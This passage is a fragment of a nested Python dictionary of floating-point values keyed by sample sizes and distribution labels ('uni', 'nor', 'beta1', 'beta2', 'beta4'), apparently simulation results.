0.7220703818527061, 'beta2': 0.9340745921343401, 'beta4': 0.6850260219180698}, 30: {'uni': 0.7149500790277772, 'nor': 0.7885112065199036, 'beta1': 0.7213375663568558, 'beta2': 0.8600427555686836, 'beta4': 0.6912613993017295}, 20: {'uni': 0.7221206453316641, 'nor': 0.7460966134674923, 'beta1': 0.7136641113944505, 'beta2': 0.8041327522868057, 'beta4': 0.7046152214673151}, 10: {'uni': 0.7078401582681484, 'nor': 0.7403186043135705, 'beta1': 0.7050250617326397, 'beta2': 0.7383220943967499, 'beta4': 0.6845552561458373}}, 300: {1000: {'uni': 0.7206526844832443, 'nor': 2.7942842452599153, 'beta1': 0.7527628702986627, 'beta2': 5.919411684201717, 'beta4': 0.3670485782403558}, 750: {'uni': 0.7509904630876584, 'nor': 
2.2739045920462093, 'beta1': 0.7349341918106195, 'beta2': 4.652614303744448, 'beta4': 0.38740876912159744}, 500: {'uni': 0.7326172812992321, 'nor': 1.790945500928653, 'beta1': 0.763447968796166, 'beta2': 3.2504723882846553, 'beta4': 0.43389149620567713}, 400: {'uni': 0.7346001289882709, 'nor': 1.6118801882818838, 'beta1': 0.7632362935242065, 'beta2': 2.715944059333255, 'beta4': 0.44766620539659857}, 300: {'uni': 0.7427068448325751, 'nor': 1.4193407381871972, 'beta1': 0.72901308536521, 'beta2': 2.2921763593149125, 'beta4': 0.47478159208735254}, 200: {'uni': 0.7372729090295441, 'nor': 1.159679435034981, 'beta1': 0.7510674151033424, 'beta2': 1.8423392212461573, 'beta4': 0.526324417635601}, 150: {'uni': 0.7335555313519704, 'nor': 1.0189459141945576, 'beta1': 0.7774470798853989, 'beta2': 1.5526247983720354, 'beta4': 0.552793650767243}, 100: {'uni': 0.7525668267368835, 'nor': 0.9300778141862717, 'beta1': 0.7349045453993331, 'beta2': 1.2690620927247336, 'beta4': 0.6069832998899233}, 75: {'uni': 0.7398060192576016, 'nor': 0.8937269970573645, 'beta1': 0.7367240662850367, 'beta2': 1.114837775599423, 'beta4': 0.6227770244286678}, 50: {'uni': 0.7361907104794088, 'nor': 0.8467145891887228, 'beta1': 0.7532248025351025, 'beta2': 1.0076451242544675, 'beta4': 0.6677669182736204}, 30: {'uni': 0.7504149824828716, 'nor': 0.8049349990129249, 'beta1': 0.7188773766156613, 'beta2': 0.8917913915287613, 'beta4': 0.7002165400571294}, 20: {'uni': 0.7314574140964747, 'nor': 0.7817553909991105, 'beta1': 0.7162634938969795, 'beta2': 0.8408597207849396, 'beta4': 0.7160054524790228}, 10: {'uni': 0.7073627129526159, 'nor': 0.7221863363680757, 'beta1': 0.7204609453804969, 'beta2': 0.7558169384121463, 'beta4': 0.6931495140186302}}, 200: {1000: {'uni': 0.7423323084504223, 'nor': 3.9465111422421497, 'beta1': 0.748201229654901, 'beta2': 7.332126221988379, 'beta4': 0.3501525587156131}, 750: {'uni': 0.746653717649964, 'nor': 3.1892224661604938, 'beta1': 0.7624407304753418, 'beta2': 5.59235179871814, 
'beta4': 0.34982032353631515}, 500: {'uni': 0.7357674078649882, 'nor': 2.251598080951371, 'beta1': 0.7423612184099468, 'beta2': 4.175521005731495, 'beta4': 0.3839217818127895}, 400: {'uni': 0.7395885933950936, 'nor': 2.0424085994835663, 'beta1': 0.7406447160909883, 'beta2': 3.2932035132001656, 'beta4': 0.40297503998297585}, 300: {'uni': 0.7577043809971838, 'nor': 1.6443666764703977, 'beta1': 0.7421027397774597, 'beta2': 2.669410854117533, 'beta4': 0.4276531839131966}, 200: {'uni': 0.7180965904307356, 'nor': 1.407264604807638, 'beta1': 0.7286293957187439, 'beta2': 2.1069547544377403, 'beta4': 0.4870983132798874}, 150: {'uni': 0.7553350101995575, 'nor': 1.1871616066279893, 'beta1': 0.7462056699655844, 'beta2': 1.723221575954481, 'beta4': 0.5273487385508362}, 100: {'uni': 0.7395542668424886, 'nor': 1.040812175501304, 'beta1': 0.7217865304155312, 'beta2': 1.3998981782184052, 'beta4': 0.5719653577277595}, 75: {'uni': 0.7179822358907298, 'nor': 0.9798839747009375, 'beta1': 0.7359864694464765, 'beta2': 1.2271310762157386, 'beta4': 0.5871809308583475}, 50: {'uni': 0.7375146921181255, 'nor': 0.9002210975474763, 'beta1': 0.7393499748203317, 'beta2': 1.0775344882196805, 'beta4': 0.6290086191247244}, 30: {'uni': 0.7169870394193528, 'nor': 0.8158188517233516, 'beta1': 0.7493460184747783, 'beta2': 0.9221767471669186, 'beta4': 0.6549135945910195}, 20: {'uni': 0.73449559591477, 'nor': 0.7810180014458455, 'beta1': 0.7420682468640403, 'beta2': 0.8780748276924514, 'beta4': 0.6867888053047261}, 10: {'uni': 0.7053108649778468, 'nor': 0.7526353976401546, 'beta1': 0.7177991673630623, 'beta2': 0.7604100266538812, 'beta4': 0.6792646013309229}}, 150: {1000: {'uni': 0.7743933245507701, 'nor': 4.870684976620477, 'beta1': 0.7493300795479252, 'beta2': 8.63035716657048, 'beta4': 0.338204647050127}, 750: {'uni': 0.7428327364622048, 'nor': 3.9085507502293373, 'beta1': 0.7529109429719044, 'beta2': 6.406659776251172, 'beta4': 0.3418060411939941}, 500: {'uni': 0.7331842699568302, 'nor': 
2.8283847000054734, 'beta1': 0.7315010738620568, 'beta2': 4.49922268514765, 'beta4': 0.3652693771266238}, 400: {'uni': 0.7477876672889165, 'nor': 2.4408121466719894, 'beta1': 0.7486680909128302, 'beta2': 3.8227114105566447, 'beta4': 0.38605950916210385}, 300: {'uni': 0.7714775991116009, 'nor': 1.978646880908542, 'beta1': 0.7471424904471909, 'beta2': 3.044832497044965, 'beta4': 0.40485929874794896}, 200: {'uni': 0.731052318190657, 'nor': 1.6207811171212545, 'beta1': 0.7474999694752592, 'beta2': 2.2933245948022067, 'beta4': 0.46781899904078245}, 150: {'uni': 0.7500922612488313, 'nor': 1.3781581966330505, 'beta1': 0.7352960756488399, 'beta2': 1.9096599656675697, 'beta4': 0.4735125299169063}, 100: {'uni': 0.7279277122549193, 'nor': 1.1692830569706523, 'beta1': 0.7506006169362144, 'beta2': 1.5128965317553913, 'beta4': 0.5319456707433308}, 75: {'uni': 0.7325339806512801, 'nor': 1.0380383734066543, 'beta1': 0.7493119761616068, 'beta2': 1.343582314436481, 'beta4': 0.5737550750224671}, 50: {'uni': 0.7294430093006015, 'nor': 0.9505171237229544, 'beta1': 0.7510871675286181, 'beta2': 1.1329544178629671, 'beta4': 0.6122179404495601}, 30: {'uni': 0.7290644337093428, 'nor': 0.8806444792243782, 'beta1': 0.7296970766498079, 'beta2': 0.9661908520938478, 'beta4': 0.6575438710614618}, 20: {'uni': 0.7222168674984393, 'nor': 0.8420048253770901, 'beta1': 0.724515988463435, 'beta2': 0.8344804556030407, 'beta4': 0.660218564428112}, 10: {'uni': 0.7244918863210531, 'nor': 0.7443455406912518, 'beta1': 0.7195377603425277, 'beta2': 0.7882387387152024, 'beta4': 0.6599711359961713}}, 100: {1000: {'uni': 0.7553514817299303, 'nor': 7.1262210456290624, 'beta1': 0.7529581062774561, 'beta2': 10.253475634536954, 'beta4': 0.3192243144730889}, 750: {'uni': 0.7791294423924775, 'nor': 5.549089935079821, 'beta1': 0.7456036542941434, 'beta2': 7.819101615055815, 'beta4': 0.3181125557346874}, 500: {'uni': 0.7464390747429561, 'nor': 4.023411042911893, 'beta1': 0.719440888915879, 'beta2': 5.393933864641589, 
'beta4': 0.3363492806120328}, 400: {'uni': 0.7436820550413948, 'nor': 3.2416913521011184, 'beta1': 0.7474703825572615, 'beta2': 4.366868426716757, 'beta4': 0.34793866437043924}, 300: {'uni': 0.7509432095906787, 'nor': 2.7020137466001795, 'beta1': 0.7409014752879322, 'beta2': 3.421463063906572, 'beta4': 0.36853309485013414}, 200: {'uni': 0.7530374509678488, 'nor': 1.960926209464229, 'beta1': 0.7241407264763559, 'beta2': 2.5782704085356767, 'beta4': 0.4078004886476791}, 150: {'uni': 0.7303983087222535, 'nor': 1.7191618969045015, 'beta1': 0.7347216143259169, 'beta2': 2.1185263308351763, 'beta4': 0.43491143509457303}, 100: {'uni': 0.7257742244079696, 'nor': 1.3801969840551045, 'beta1': 0.7176852231223901, 'beta2': 1.642329425975999, 'beta4': 0.48139070090467456}, 75: {'uni': 0.7517164534931338, 'nor': 1.1818603840334319, 'beta1': 0.7286890186729597, 'beta2': 1.4443184215810094, 'beta4': 0.5183068449522771}, 50: {'uni': 0.7621688606289894, 'nor': 1.0872999413300521, 'beta1': 0.7489827238342822, 'beta2': 1.1848949847718624, 'beta4': 0.5656741415128054}, 30: {'uni': 0.7298084592363608, 'nor': 0.9332998548420763, 'beta1': 0.7387444178885003, 'beta2': 1.0252251878747998, 'beta4': 0.6210582954782421}, 20: {'uni': 0.7441136225233612, 'nor': 0.8527112995573832, 'beta1': 0.7462672248306345, 'beta2': 0.913108948983176, 'beta4': 0.640746443418552}, 10: {'uni': 0.737481767799042, 'nor': 0.7654531340705115, 'beta1': 0.7209580518994956, 'beta2': 0.7703295902259096, 'beta4': 0.6595379429157052}}, 75: {1000: {'uni': 0.8074067248637035, 'nor': 8.982703727613933, 'beta1': 0.7462766315317871, 'beta2': 11.863615971347793, 'beta4': 0.30969669346453244}, 750: {'uni': 0.7905502080924112, 'nor': 7.0625027723964555, 'beta1': 0.7385904561393585, 'beta2': 8.813594802870487, 'beta4': 0.3083689380574924}, 500: {'uni': 0.7664044582012062, 'nor': 5.092979689603615, 'beta1': 0.734519756167919, 'beta2': 5.915617089146454, 'beta4': 0.32579897334383345}, 400: {'uni': 0.7643419874704518, 'nor': 
4.082652680068739, 'beta1': 0.7280388893196177, 'beta2': 4.9326418878616085, 'beta4': 0.3443768536878751}, 300: {'uni': 0.7578970756907041, 'nor': 3.305189980415632, 'beta1': 0.7535727790132047, 'beta2': 3.8986893775132603, 'beta4': 0.3523585783087568}, 200: {'uni': 0.7627668279519347, 'nor': 2.366352321461588, 'beta1': 0.7478063096454467, 'beta2': 2.774930336104137, 'beta4': 0.37895595523501135}, 150: {'uni': 0.7551498483242116, 'nor': 2.0146806648840867, 'beta1': 0.715322504892067, 'beta2': 2.27236351355193, 'beta4': 0.4024298445706972}, 100: {'uni': 0.7394637596741217, 'nor': 1.526892470851258, 'beta1': 0.7534285806985298, 'beta2': 1.7401398926989977, 'beta4': 0.4449932415566237}, 75: {'uni': 0.7489504482916669, 'nor': 1.4189660002627995, 'beta1': 0.7590111719264389, 'beta2': 1.4816546253016176, 'beta4': 0.4799916438012694}, 50: {'uni': 0.7231634928736738, 'nor': 1.1665468171368905, 'beta1': 0.7205514516102951, 'beta2': 1.246946632314395, 'beta4': 0.528271236289555}, 30: {'uni': 0.6919736066483383, 'nor': 0.9752350712342117, 'beta1': 0.7326947145486271, 'beta2': 1.017214779212776, 'beta4': 0.6056915196333973}, 20: {'uni': 0.7321248137346815, 'nor': 0.8847322215404421, 'beta1': 0.7436111945765038, 'beta2': 0.9369344506464795, 'beta4': 0.6038200746587884}, 10: {'uni': 0.6999936271725347, 'nor': 0.8176052890572043, 'beta1': 0.7414589395343638, 'beta2': 0.7860543175475491, 'beta4': 0.6658013359881663}}, 50: {1000: {'uni': 0.9349315291336215, 'nor': 13.43691200121997, 'beta1': 0.7415667280225452, 'beta2': 14.529533357585608, 'beta4': 0.3020722643250528}, 750: {'uni': 0.8664297277263152, 'nor': 10.124177956990547, 'beta1': 0.7325637726044728, 'beta2': 10.705574218801685, 'beta4': 0.312164534002672}, 500: {'uni': 0.8012745715384612, 'nor': 7.101608627678545, 'beta1': 0.7482701388420466, 'beta2': 7.331886152921014, 'beta4': 0.3132485584859663}, 400: {'uni': 0.7993068988068693, 'nor': 5.876195499992661, 'beta1': 0.7360457214123197, 'beta2': 5.958198160314339, 'beta4': 
0.3272571358134039}, 300: {'uni': 0.7699389442266666, 'nor': 4.551685320466588, 'beta1': 0.7579543434178201, 'beta2': 4.754383485607729, 'beta4': 0.33214677485760385}, 200: {'uni': 0.7737453062936557, 'nor': 3.2743330060587614, 'beta1': 0.7467458291008919, 'beta2': 3.3223709289687107, 'beta4': 0.35436399242374406}, 150: {'uni': 0.7490417235906979, 'nor': 2.6767446787215903, 'beta1': 0.7422159085910014, 'beta2': 2.644746427650133, 'beta4': 0.3714173165341442}, 100: {'uni': 0.7313624526865553, 'nor': 1.9870868548615173, 'beta1': 0.7285126816888758, 'beta2': 2.001888568131041, 'beta4': 0.3952418926791647}, 75: {'uni': 0.7172671987386803, 'nor': 1.6644805287512636, 'beta1': 0.7378322413195023, 'beta2': 1.7028170741593902, 'beta4': 0.43605827899361954}, 50: {'uni': 0.7253230461458138, 'nor': 1.3592272923869326, 'beta1': 0.7452200834032827, 'beta2': 1.3910336399973648, 'beta4': 0.48237565357444456}, 30: {'uni': 0.70803267861597, 'nor': 1.1549808891273663, 'beta1': 0.7232959969444372, 'beta2': 1.0990097769678915, 'beta4': 0.5413580844578947}, 20: {'uni': 0.7363216314094163, 'nor': 0.9876308421952716, 'beta1': 0.7438260730972865, 'beta2': 0.9306032071823038, 'beta4': 0.5831508780013659}, 10: {'uni': 0.7023687035868975, 'nor': 0.8443556631337041, 'beta1': 0.7158289089041515, 'beta2': 0.8017849117678024, 'beta4': 0.6252855701087432}}, 30: {1000: {'uni': 1.135433662003403, 'nor': 22.975611110150748, 'beta1': 0.7573893837030105, 'beta2': 17.74359800346252, 'beta4': 0.297757902293249}, 750: {'uni': 1.0311045283721894, 'nor': 16.483343618177887, 'beta1': 0.7534113622478869, 'beta2': 13.482644094659875, 'beta4': 0.30160940624087845}, 500: {'uni': 0.9139362430769883, 'nor': 11.705414821489235, 'beta1': 0.7484586324824043, 'beta2': 9.438769937249091, 'beta4': 0.3069397480593394}, 400: {'uni': 0.8855972092427258, 'nor': 9.037255267934396, 'beta1': 0.7733590733817911, 'beta2': 7.576713118210859, 'beta4': 0.3152328706658135}, 300: {'uni': 0.8498607707121014, 'nor': 7.206132571959497, 
'beta1': 0.7418514574998677, 'beta2': 5.530582974473799, 'beta4': 0.31689463862324563}, 200: {'uni': 0.7917662970649914, 'nor': 5.077848982496681, 'beta1': 0.7304678805443476, 'beta2': 4.204779606913517, 'beta4': 0.3278334953907271}, 150: {'uni': 0.7910806456951968, 'nor': 4.004868875294406, 'beta1': 0.7261505015937928, 'beta2': 3.2079402231129976, 'beta4': 0.3447490181814188}, 100: {'uni': 0.7696591554811341, 'nor': 2.8972005461946866, 'beta1': 0.7297127847288362, 'beta2': 2.3363724000389023, 'beta4': 0.35895086880667004}, 75: {'uni': 0.7363424176614078, 'nor': 2.369420393366632, 'beta1': 0.7526904627618415, 'beta2': 1.9306149063833873, 'beta4': 0.3874230408263742}, 50: {'uni': 0.7096140875475437, 'nor': 1.792450944189413, 'beta1': 0.7162393369797683, 'beta2': 1.4435381512650722, 'beta4': 0.4180218110706144}, 30: {'uni': 0.6993735822894044, 'nor': 1.381219120953892, 'beta1': 0.7092864199251419, 'beta2': 1.1978302897457505, 'beta4': 0.4927113098977276}, 20: {'uni': 0.6854105477122527, 'nor': 1.1684502381086352, 'beta1': 0.7297155809453436, 'beta2': 0.9860055568654263, 'beta4': 0.5218496571816182}, 10: {'uni': 0.6769793341065574, 'nor': 0.9298827298857523, 'beta1': 0.6991421468165611, 'beta2': 0.8384852567044772, 'beta4': 0.5911355331329511}}, 20: {1000: {'uni': 1.5422767881732407, 'nor': 33.623007842941036, 'beta1': 0.8076770761473828, 'beta2': 21.81645368130898, 'beta4': 0.29400214136669206}, 750: {'uni': 1.3565649257548582, 'nor': 25.500787968320108, 'beta1': 0.7836354489834423, 'beta2': 17.05613211546847, 'beta4': 0.2953552404790611}, 500: {'uni': 1.1554066269622438, 'nor': 17.366509269093996, 'beta1': 0.7653357621752842, 'beta2': 11.45041336876129, 'beta4': 0.3037530374927966}, 400: {'uni': 1.0737530948566782, 'nor': 13.540388043219384, 'beta1': 0.7654090294473117, 'beta2': 9.518851192493647, 'beta4': 0.30367790135580414}, 300: {'uni': 0.9765351746747871, 'nor': 10.717684596621698, 'beta1': 0.7362009325282473, 'beta2': 7.150808242448672, 'beta4': 
0.3124982191238184}, 200: {'uni': 0.9002188501928331, 'nor': 7.062770475092731, 'beta1': 0.7397883860335908, 'beta2': 4.777154184591877, 'beta4': 0.3159112478562884}, 150: {'uni': 0.8335790056399025, 'nor': 5.58483897460766, 'beta1': 0.7460132208826435, 'beta2': 3.7165330190336245, 'beta4': 0.31991308480594854}, 100: {'uni': 0.7937288019209847, 'nor': 3.9655772323210314, 'beta1': 0.7411963443373258, 'beta2': 2.7650571950679814, 'beta4': 0.3337932064372245}, 75: {'uni': 0.7633892696634527, 'nor': 3.175438383816786, 'beta1': 0.7017838867635625, 'beta2': 2.1935080303965084, 'beta4': 0.35892212583393873}, 50: {'uni': 0.727388616390112, 'nor': 2.3492749534444273, 'beta1': 0.7307786603085943, 'beta2': 1.6613293154255553, 'beta4': 0.3860365833166761}, 30: {'uni': 0.7221576207335421, 'nor': 1.7443088681216943, 'beta1': 0.7203994812969841, 'beta2': 1.228838728852705, 'beta4': 0.4307713330938513}, 20: {'uni': 0.7041433273507007, 'nor': 1.3875298207339808, 'beta1': 0.7244642373998895, 'beta2': 1.0943181325266345, 'beta4': 0.4811743703599059}, 10: {'uni': 0.7012223644343135, 'nor': 1.0245301878477195, 'beta1': 0.6986917466557336, 'beta2': 0.8714720199283585, 'beta4': 0.5538253794857232}}, 10: {1000: {'uni': 3.3860305779409425, 'nor': 69.12629967805236, 'beta1': 1.3311840432830941, 'beta2': 31.886608192512867, 'beta4': 0.30148004390899985}, 750: {'uni': 2.760308940939271, 'nor': 52.32712111436736, 'beta1': 1.1485351997801594, 'beta2': 23.88091780382947, 'beta4': 0.3007675448851966}, 500: {'uni': 2.1187788625497666, 'nor': 34.12244249918099, 'beta1': 0.9875632983483154, 'beta2': 16.303450154076117, 'beta4': 0.29315714851845276}, 400: {'uni': 1.812743282248588, 'nor': 27.535347493750546, 'beta1': 0.9603589961065766, 'beta2': 12.942852748453202, 'beta4': 0.2995636993008456}, 300: {'uni': 1.5698543440275912, 'nor': 20.31822234635588, 'beta1': 0.868758435808308, 'beta2': 9.943250031735536, 'beta4': 0.2966653980441081}, 200: {'uni': 1.2831488048321131, 'nor': 14.727951422793442, 
'beta1': 0.8356737691150327, 'beta2': 6.740556657840313, 'beta4': 0.2943697452228861}, 150: {'uni': 1.1268925713293234, 'nor': 10.597118226400635, 'beta1': 0.8108033084059241, 'beta2': 5.115279274356808, 'beta4': 0.31424178539635517}, 100: {'uni': 0.9635160740767054, 'nor': 7.301349015655083, 'beta1': 0.7560708487156951, 'beta2': 3.648381304348421, 'beta4': 0.3048069455780913}, 75: {'uni': 0.8838515573613532, 'nor': 5.74338502795036, 'beta1': 0.744462441212371, 'beta2': 2.818074827786014, 'beta4': 0.3212073081339402}, 50: {'uni': 0.8291338828064758, 'nor': 3.9533981841058488, 'beta1': 0.7380188306751617, 'beta2': 2.094258280901449, 'beta4': 0.3292230380642782}, 30: {'uni': 0.7644312433974103, 'nor': 2.720441186648777, 'beta1': 0.7113163970445261, 'beta2': 1.5020958427312148, 'beta4': 0.3621051408260878}, 20: {'uni': 0.7031423578740116, 'nor': 2.1168935580804584, 'beta1': 0.7043135043678577, 'beta2': 1.1671964551964154, 'beta4': 0.3941268196263035}, 10: {'uni': 0.6876344879848008, 'nor': 1.3628066525293088, 'beta1': 0.6874249300009232, 'beta2': 0.8861925569465577, 'beta4': 0.46282421765776804}}}, 0.1: {1000: {1000: {'uni': 0.34522862285111255, 'nor': 0.6228395073147752, 'beta1': 0.3491475301557177, 'beta2': 1.8016479493371311, 'beta4': 0.24424001680972462}, 750: {'uni': 0.34067029159943607, 'nor': 0.5499598659017021, 'beta1': 0.3486635011755686, 'beta2': 1.3479403032586368, 'beta4': 0.256937225000032}, 500: {'uni': 0.3464084343284053, 'nor': 0.47208323276435604, 'beta1': 0.3459987511001463, 'beta2': 0.9576128375739897, 'beta4': 0.2758735009645715}, 400: {'uni': 0.3523467281914471, 'nor': 0.4515226651894629, 'beta1': 0.3519476796699666, 'beta2': 0.7978696641078354, 'beta4': 0.2864827600190153}, 300: {'uni': 0.3477454390980137, 'nor': 0.423596083058182, 'beta1': 0.3465963700708253, 'beta2': 0.6876688970007049, 'beta4': 0.2976169379574473}, 200: {'uni': 0.3445409313119668, 'nor': 0.4030581972395861, 'beta1': 0.3492651184466396, 'beta2': 0.5551933075253935, 'beta4': 
0.31556439238679485}, 150: {'uni': 0.3498705624747738, 'nor': 0.3918102011857414, 'beta1': 0.3456677542317484, 'beta2': 0.49624702752060124, 'beta4': 0.3242273287196293}, 100: {'uni': 0.3436893083795591, 'nor': 0.37284776795342023, 'beta1': 0.34771284546605924, 'beta2': 0.4466105146595203, 'beta4': 0.32803306387910325}, 75: {'uni': 0.3475867160617753, 'nor': 0.36340645271259714, 'beta1': 0.34938185672749816, 'beta2': 0.4170327188966793, 'beta4': 0.32843949400931977}, 50: {'uni': 0.35055629128861204, 'nor': 0.35940286705773605, 'beta1': 0.34632894455437757, 'beta2': 0.3950444302670791, 'beta4': 0.3380127773421535}, 30: {'uni': 0.34398236878275323, 'nor': 0.3513554868714947, 'beta1': 0.34746531457584257, 'beta2': 0.37326172618762804, 'beta4': 0.3377301023189335}, 20: {'uni': 0.35212346707498915, 'nor': 0.3491050335472612, 'beta1': 0.33698617941167014, 'beta2': 0.36496711101835394, 'beta4': 0.3399147522136969}, 10: {'uni': 0.3455385083140642, 'nor': 0.3550667091655473, 'beta1': 0.3455192835205828, 'beta2': 0.3588059524171947, 'beta4': 0.34715372359343916}}, 750: {1000: {'uni': 0.34909526053327966, 'nor': 0.7000192716607003, 'beta1': 0.3436461639650576, 'beta2': 1.7826637593470094, 'beta4': 0.23043671233693377}, 750: {'uni': 0.3521350266061196, 'nor': 0.6065082789810716, 'beta1': 0.3477266969960249, 'beta2': 1.3463479370664821, 'beta4': 0.24140925534497648}, 500: {'uni': 0.3407122010380868, 'nor': 0.5269610372045576, 'beta1': 0.3460101335915343, 'beta2': 0.9369997288365739, 'beta4': 0.2617272822804359}, 400: {'uni': 0.34515571530717193, 'nor': 0.47877303335524596, 'beta1': 0.34752902436605043, 'beta2': 0.8230256289242237, 'beta4': 0.2700214004987484}, 300: {'uni': 0.3483072253851639, 'nor': 0.44993562666728104, 'beta1': 0.349268527034077, 'beta2': 0.6926501525691608, 'beta4': 0.2853686593826423}, 200: {'uni': 0.3470296256996466, 'nor': 0.4196297568242823, 'beta1': 0.34021112730517444, 'beta2': 0.562300202363076, 'beta4': 0.2998847086772037}, 150: {'uni': 
0.3464761692956304, 'nor': 0.4042287728631724, 'beta1': 0.3452130359466471, 'beta2': 0.5089640450206934, 'beta4': 0.3081680855306012}, 100: {'uni': 0.35076633420093445, 'nor': 0.378135460048976, 'beta1': 0.3508849050425952, 'beta2': 0.45863169971558315, 'beta4': 0.31859381410486026}, 75: {'uni': 0.3436998033966782, 'nor': 0.3766331003411186, 'beta1': 0.3470801575318038, 'beta2': 0.4256019265347618, 'beta4': 0.33483905786401014}, 50: {'uni': 0.344343221396323, 'nor': 0.3561890060241063, 'beta1': 0.3445446190015034, 'beta2': 0.3984536383725175, 'beta4': 0.33210741741488403}, 30: {'uni': 0.34480539602579574, 'nor': 0.3574621127262308, 'beta1': 0.3463821171864507, 'beta2': 0.37860713383012484, 'beta4': 0.34241644586079795}, 20: {'uni': 0.3492479116908845, 'nor': 0.3468836182897213, 'beta1': 0.3470397303687519, 'beta2': 0.3771778056363512, 'beta4': 0.34309117628812213}, 10: {'uni': 0.34716489049413923, 'nor': 0.34726854629110016, 'beta1': 0.3419429175321523, 'beta2': 0.35692148413605357, 'beta4': 0.34471917186703666}}, 500: {1000: {'uni': 0.34980366649542444, 'nor': 0.8828084069791858, 'beta1': 0.34530404469333964, 'beta2': 2.0390420881992393, 'beta4': 0.21060713902409867}, 750: {'uni': 0.34562049614934987, 'nor': 0.7441575486111333, 'beta1': 0.3446423604936914, 'beta2': 1.5454359942202134, 'beta4': 0.2246312059363231}, 500: {'uni': 0.3499479954535063, 'nor': 0.6104516800045718, 'beta1': 0.34661641393000875, 'beta2': 1.115591239340158, 'beta4': 0.24370751974629912}, 400: {'uni': 0.34623159080404736, 'nor': 0.5643795655935262, 'beta1': 0.34395608282034135, 'beta2': 0.9504329301967376, 'beta4': 0.250956210503198}, 300: {'uni': 0.3425969194301464, 'nor': 0.5049407623024504, 'beta1': 0.35235321689257676, 'beta2': 0.7939578647402028, 'beta4': 0.2683519210299116}, 200: {'uni': 0.3430607177495854, 'nor': 0.44879745877719035, 'beta1': 0.34501529777041695, 'beta2': 0.6292580338502747, 'beta4': 0.2855608768253181}, 150: {'uni': 0.34587642193397855, 'nor': 0.4204615533940365, 
'beta1': 0.34164713670280794, 'beta2': 0.5737249925775849, 'beta4': 0.2971573193037079}, 100: {'uni': 0.34238445175117393, 'nor': 0.39388029037529504, 'beta1': 0.34902341792659347, 'beta2': 0.48221913721243437, 'beta4': 0.31469965931902977}, 75: {'uni': 0.3467116122075039, 'nor': 0.38817290389677783, 'beta1': 0.3517222324649411, 'beta2': 0.4486988314905505, 'beta4': 0.32065899569382833}, 50: {'uni': 0.3448974429488288, 'nor': 0.376999764119375, 'beta1': 0.34970045899172114, 'beta2': 0.4136016266145007, 'beta4': 0.3315402268547066}, 30: {'uni': 0.3450763942702253, 'nor': 0.359582406629779, 'beta1': 0.3475273188847172, 'beta2': 0.381992042961191, 'beta4': 0.3323036796222379}, 20: {'uni': 0.34867510464529977, 'nor': 0.35014087360264345, 'beta1': 0.34548306845712595, 'beta2': 0.3741498903455569, 'beta4': 0.33936857819735566}, 10: {'uni': 0.3389678071344472, 'nor': 0.3462171225002532, 'beta1': 0.3461858964125291, 'beta2': 0.35768688824311, 'beta4': 0.3454448002505371}}, 400: {1000: {'uni': 0.3412747607815299, 'nor': 1.0177178883630658, 'beta1': 0.3438242054634319, 'beta2': 1.9913254002158856, 'beta4': 0.20113561884912903}, 750: {'uni': 0.3490577726510959, 'nor': 0.8509827458513439, 'beta1': 0.34652921822246546, 'beta2': 1.5201078157253372, 'beta4': 0.211333303577262}, 500: {'uni': 0.34798773863259724, 'nor': 0.6755895166899817, 'beta1': 0.3473790211653727, 'beta2': 1.0987363289188878, 'beta4': 0.23196600902080236}, 400: {'uni': 0.3489527480495489, 'nor': 0.6044191427433583, 'beta1': 0.3467577402388518, 'beta2': 0.9335980474056014, 'beta4': 0.24488800695361335}, 300: {'uni': 0.3471155869537724, 'nor': 0.5508015092134401, 'beta1': 0.34424189925102483, 'beta2': 0.7935271208610247, 'beta4': 0.25747813877459824}, 200: {'uni': 0.3445568797042115, 'nor': 0.4675967309526432, 'beta1': 0.3500645313101199, 'beta2': 0.6739017550399186, 'beta4': 0.2743681532845661}, 150: {'uni': 0.35361449117436006, 'nor': 0.4511309221562023, 'beta1': 0.3462218569002684, 'beta2': 0.5791382939670757, 
'beta4': 0.2887616378271954}, 100: {'uni': 0.34500319374883415, 'nor': 0.41178634546653503, 'beta1': 0.34728954575526966, 'beta2': 0.5011804138006778, 'beta4': 0.3034732161183125}, 75: {'uni': 0.34557108489320804, 'nor': 0.3989063728632237, 'beta1': 0.3470788068835562, 'beta2': 0.4569511082377164, 'beta4': 0.3171266416110887}, 50: {'uni': 0.3469017207004219, 'nor': 0.38520506727358106, 'beta1': 0.34612160245120194, 'beta2': 0.41185340415894384, 'beta4': 0.32620775126216733}, 30: {'uni': 0.34632131112233244, 'nor': 0.36585499457591303, 'beta1': 0.3444607742924859, 'beta2': 0.3889474502225472, 'beta4': 0.3336066143492354}, 20: {'uni': 0.3502013005709345, 'nor': 0.36446150318855836, 'beta1': 0.3479197101489542, 'beta2': 0.3737133387595116, 'beta4': 0.3364565889405686}, 10: {'uni': 0.34007066527671714, 'nor': 0.349271960957368, 'beta1': 0.33995922081352276, 'beta2': 0.36095135551696184, 'beta4': 0.3422350611007681}}, 300: {1000: {'uni': 0.34780248511164635, 'nor': 1.2459233986726455, 'beta1': 0.34744144501755014, 'beta2': 2.2084838579165464, 'beta4': 0.189081472987699}, 750: {'uni': 0.34654011205832125, 'nor': 1.006322838980424, 'beta1': 0.34742183633042256, 'beta2': 1.7091687862980112, 'beta4': 0.1986938433930994}, 500: {'uni': 0.3456791171060871, 'nor': 0.7751979278397534, 'beta1': 0.3440113776197222, 'beta2': 1.2092320961421312, 'beta4': 0.217132298417705}, 400: {'uni': 0.3489269333627507, 'nor': 0.7044423515166887, 'beta1': 0.34411795808308093, 'beta2': 1.0310653608432898, 'beta4': 0.23030128761412128}, 300: {'uni': 0.34837799124822233, 'nor': 0.606506473158486, 'beta1': 0.3492891192903364, 'beta2': 0.9333450580111946, 'beta4': 0.2408361375200047}, 200: {'uni': 0.34730139025972234, 'nor': 0.5272296871475277, 'beta1': 0.33971683925089174, 'beta2': 0.7361677221850133, 'beta4': 0.2637544743748866}, 150: {'uni': 0.34760670816432354, 'nor': 0.481145213232932, 'beta1': 0.3467693322076453, 'beta2': 0.6173032899166593, 'beta4': 0.2750328241811572}, 100: {'uni': 
